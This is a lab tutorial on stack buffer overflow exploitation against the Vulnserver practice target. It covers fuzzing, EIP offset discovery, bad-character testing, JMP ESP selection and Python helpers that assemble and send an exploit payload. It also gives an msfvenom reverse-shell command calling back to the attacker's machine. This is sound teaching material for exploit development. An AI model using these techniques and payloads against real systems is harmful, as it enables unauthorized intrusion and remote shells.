Buffer Overflow
Last updated
A buffer overflow is a common vulnerability in applications that accept more data than the allocated buffer can hold: the excess is written past the end of the buffer, over whatever sits next to it in memory. On the stack that neighbouring data includes the saved return address, which is what the rest of this guide targets.
This guide assumes that you can run the (potentially) vulnerable application under Immunity Debugger on a Windows machine you control, and that you attack it from a Linux (Kali) machine on the same network. Vulnserver is used as the practice target.
Windows machine (target): runs Vulnserver under Immunity Debugger
Linux machine (attacker): Kali, used to fuzz the service and deliver the exploit
Install Immunity Debugger on the Windows machine.
Run Vulnserver in Immunity Debugger (open or attach to the process, then let it run; a process paused in the debugger will not accept connections).
Connect to Vulnserver from Kali to confirm it is reachable: nc -nv <Target IP> 9999
Spiking involves sending crafted input to each command the target service accepts to see which of them crash it. The purpose is to find the command that mishandles long input; a crash is only the first hint, and the one worth pursuing is a crash in which the debugger shows EIP overwritten with bytes you sent.
Fuzzing is the systematic follow-up: send steadily increasing amounts of data (for example, 100 bytes more per round) to the command that crashed, to find roughly how many bytes are needed to trigger the crash. When the application dies, check EIP (the Extended Instruction Pointer, the register that holds the address of the next instruction to execute) in the debugger. If it reads 41414141, the "A"s you sent have overwritten the saved return address, and the next step is to find exactly where in your input those four bytes fell.
Once you know the approximate crash length, use Metasploit's pattern_create and pattern_offset to find the exact offset, the distance from the start of your input to the four bytes that land in EIP. pattern_create produces a non-repeating pattern of that length; after sending it, read the EIP value from the debugger and give it to pattern_offset, which tells you where in the pattern those bytes occur. Knowing this offset is essential for crafting a precise exploit.
pattern_create: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>
pattern_offset: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q <EIP value as shown in the debugger>
Neither script needs root, so sudo is unnecessary. Give -q the eight hex digits exactly as Immunity displays EIP; the script accounts for the little-endian byte order itself.
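As an added stand-alone example (not part of the original page and not Metasploit's own code), the same cyclic-pattern logic in Python, which makes clear what the two scripts do and why pattern_offset takes the EIP value as the debugger displays it: x86 is little-endian, so the four bytes appear in memory in reverse order. The sample EIP value 386F4337 in the test is constructed for illustration.

```python
import string
import struct

# upper x lower x digit triplets, 3 bytes each; beyond this the pattern would repeat
PATTERN_MAX = 26 * 26 * 10 * 3


def pattern_create(length: int) -> bytes:
    """Build a non-repeating pattern like pattern_create.rb: Aa0Aa1Aa2...Ab0Ab1..."""
    if length > PATTERN_MAX:
        raise ValueError(f"length above {PATTERN_MAX} would repeat")
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_hex: str, length: int):
    """Offset of the 4 bytes that landed in EIP, or None if they are not in the pattern.

    eip_hex is the value as the debugger shows it, e.g. 386F4337 (a constructed sample).
    Little-endian storage means those bytes sit in memory as 37 43 6F 38 = b"7Co8",
    which is what struct.pack("<I", ...) produces and what we search for.
    """
    needle = struct.pack("<I", int(eip_hex, 16))
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


if __name__ == "__main__":
    print(pattern_create(3000)[:40].decode())
    print(pattern_offset("386F4337", 3000))
```

If pattern_offset returns None, the value in EIP did not come from your pattern intact: either the input was truncated or mangled before it reached the stack (see bad characters below), or the crash is not the one you think.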
After identifying the offset, confirm that you really control EIP: send exactly offset bytes of filler followed by four distinctive bytes (for example BBBB) and check that EIP reads 42424242. Once it does, you can place at that position the address of an instruction that redirects execution into your buffer (typically a JMP ESP, since ESP points at the bytes that follow the overwritten return address), so that the program continues into your shellcode.
Next, identify the "bad characters": byte values the application mangles, truncates or refuses, which would corrupt your payload on the way to the stack. 0x00 (the string terminator) is bad almost everywhere, and 0x0A and 0x0D are common offenders in text protocols. Send every byte value from 0x01 to 0xFF after the offset, follow ESP in the debugger's memory dump, and compare what arrived with what you sent: the first byte that is missing or altered is bad. Exclude it, resend, and repeat until the whole sequence arrives intact. These bytes must appear in neither the return address nor the shellcode.
Now find the right module to take the return address from. You need a JMP ESP (or equivalent) instruction whose address contains no bad characters and that lives in a module loaded without protections such as ASLR, DEP, SafeSEH or rebasing, so the address is the same on every run; the vulnerable program's own DLLs are the usual candidates. In Immunity Debugger the mona plugin does this work (!mona modules lists loaded modules with their protections, !mona jmp -r esp lists usable jump addresses). Remember that the address goes into the payload in little-endian byte order.
Shellcode is the payload that you inject into the target application to execute arbitrary code. msfvenom (from the Metasploit Framework) can generate it: tell it the bad characters to avoid (its -b option), target the x86 architecture, and ask for output in a form you can paste into your exploit. The shellcode typically opens a reverse shell back to your machine, so start a listener on the chosen port before sending it. Because the encoder's decoder stub unpacks the shellcode on the stack, a short NOP sled (0x90 bytes) between the return address and the shellcode gives it room.
Once EIP is controlled and the shellcode is placed after the return address, send the final payload. If the offset, return address and bad-character list are all correct, the JMP ESP lands in the NOP sled, the shellcode runs, and you get a shell with the privileges of the vulnerable service.
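Putting the stages together, here is an added Python example (not from the original page, and not Vulnserver or Metasploit code) of the helpers an exploit script for a Vulnserver-style TCP service needs: the growing buffers for fuzzing, the bad-character test string, a comparison of what was sent with what the debugger shows at ESP, the EIP-control check, and the final payload assembly. The command prefix, the return address 0x11223344, the INT3 placeholder shellcode and the "observed" stack bytes used in the test are all assumptions or constructed data; substitute the command that crashed during spiking, the JMP ESP address from the module step, and shellcode from msfvenom.

```python
import socket
import struct


def fuzz_lengths(start: int = 100, step: int = 100, stop: int = 5000) -> list[int]:
    """Buffer sizes to send one per connection until the service stops answering."""
    return list(range(start, stop + 1, step))


def badchar_test_bytes(exclude: bytes = b"\x00") -> bytes:
    """Every byte 0x01..0xFF except those already known bad (0x00 assumed bad from the start)."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def find_bad_chars(sent: bytes, observed: bytes) -> list[int]:
    """Compare the bytes sent with the bytes dumped from ESP in the debugger.

    Returns every byte that is missing or altered. A truncating byte (like 0x00)
    makes everything after it mismatch too, so treat the first entry as the real
    culprit, add it to the exclude list, and resend.
    """
    return [b for i, b in enumerate(sent) if i >= len(observed) or observed[i] != b]


def eip_is_controlled(marker: bytes, eip_hex: str) -> bool:
    """True if the debugger's EIP value is exactly the marker bytes sent (BBBB -> 42424242)."""
    return struct.pack("<I", int(eip_hex, 16)) == marker


def build_payload(prefix: bytes, offset: int, ret_addr: int, shellcode: bytes,
                  nop_sled: int = 16, bad: bytes = b"\x00") -> bytes:
    """prefix + filler up to EIP + little-endian return address + NOP sled + shellcode.

    Refuses to build a payload whose return address or shellcode contains a bad
    character, since the service would mangle it on the way to the stack.
    """
    ret = struct.pack("<I", ret_addr)
    for b in bad:
        if b in ret:
            raise ValueError(f"return address contains bad char {b:#04x}")
        if b in shellcode:
            raise ValueError(f"shellcode contains bad char {b:#04x}; regenerate with -b")
    return prefix + b"A" * offset + ret + b"\x90" * nop_sled + shellcode


def send_payload(host: str, port: int, payload: bytes, timeout: float = 5.0) -> None:
    """Deliver a payload; assumes the service greets with a banner first, as Vulnserver does."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)  # discard the banner
        s.sendall(payload)


if __name__ == "__main__":
    # Placeholder values: replace with the results of your own spiking, offset and module steps.
    PREFIX = b"COMMAND "      # assumption: the command string that crashed during spiking
    OFFSET = 2003             # from pattern_offset
    JMP_ESP = 0x11223344      # hypothetical JMP ESP address; must contain no bad characters
    SHELLCODE = b"\xcc" * 4   # placeholder INT3s; real payload from msfvenom, e.g.
    # msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP> LPORT=<port> EXITFUNC=thread -a x86 -b "\x00" -f py
    payload = build_payload(PREFIX, OFFSET, JMP_ESP, SHELLCODE)
    print(f"payload is {len(payload)} bytes; EIP will read {JMP_ESP:08X}")
    # send_payload("192.0.2.10", 9999, payload)  # only against your own lab target
```

Each helper maps to one stage of the guide: loop over fuzz_lengths() until the service dies, send badchar_test_bytes() and feed the ESP dump to find_bad_chars(), confirm eip_is_controlled() with a BBBB marker, then build_payload() with the JMP ESP address and msfvenom output. EXITFUNC=thread keeps the service process alive after the shell exits, which matters when you want to retry.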